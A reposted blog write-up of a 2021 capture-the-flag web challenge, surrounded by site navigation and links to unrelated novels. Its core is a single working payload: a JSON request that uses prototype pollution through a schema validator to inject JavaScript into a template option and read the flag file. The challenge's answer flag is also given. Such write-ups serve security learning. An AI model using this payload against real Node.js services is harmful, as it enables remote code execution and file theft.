当前位置:首页 » 《休闲阅读》 » 正文

2021年“绿城杯”网络安全大赛-Web-Looking for treasure_夜白君的博客

6 人参与  2022年02月14日 14:50  分类 : 《休闲阅读》  评论

点击全文阅读


2021年“绿城杯”网络安全大赛-Web-Looking for treasure

题目名称:Looking for treasure
题目内容:从中找到宝藏题目分值:200.0
题目难度:中等
相关附件:Looking for treasure的附件6.txt

解题思路:

1.原题直接附上payload

POST /validated/json-schema/validate
Content-Type: application/json
{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}

2.拿到flag

DASCTF{443a3172111bb28cd26f6eae1a90ea1a}

在这里插入图片描述


点击全文阅读


本文链接:http://zhangshiyu.com/post/34743.html

题目  附件  解题  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 完结版《新婚夜,高冷夜王不禁撩》免费阅读
  • 宋以禾安知雾小说在线章节免费阅读(直播:拐个高冷医生当老公无弹窗无删减)
  • 听说她人淡如菊免费阅读全文,主角曹薇景恬小说完整版
  • 快手热推《我死后,男友攥着产检单发疯了》小说主角宋沁棠陆景闲在线阅读
  • 《织女:杀死恋爱脑》倪丝音孙晓义小说全章节最新阅读
  • 高质量小说全县穿越日本,从北海道开始崛起在线试读
  • 在线寻找新婚夜,高冷夜王不禁撩小说的无删减版本
  • 重生变成癌细胞高辰宇李新春在线章节免费阅读
  • 描写风吹诗句
  • 倪初蕴晋萧祁全集晋萧祁倪初蕴推荐完本_推荐完本倪初蕴晋萧祁全集(晋萧祁倪初蕴)
  • 主人公叫卿酒酒的小说极品小师妹在线阅读章节
  • 新年现代诗歌

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1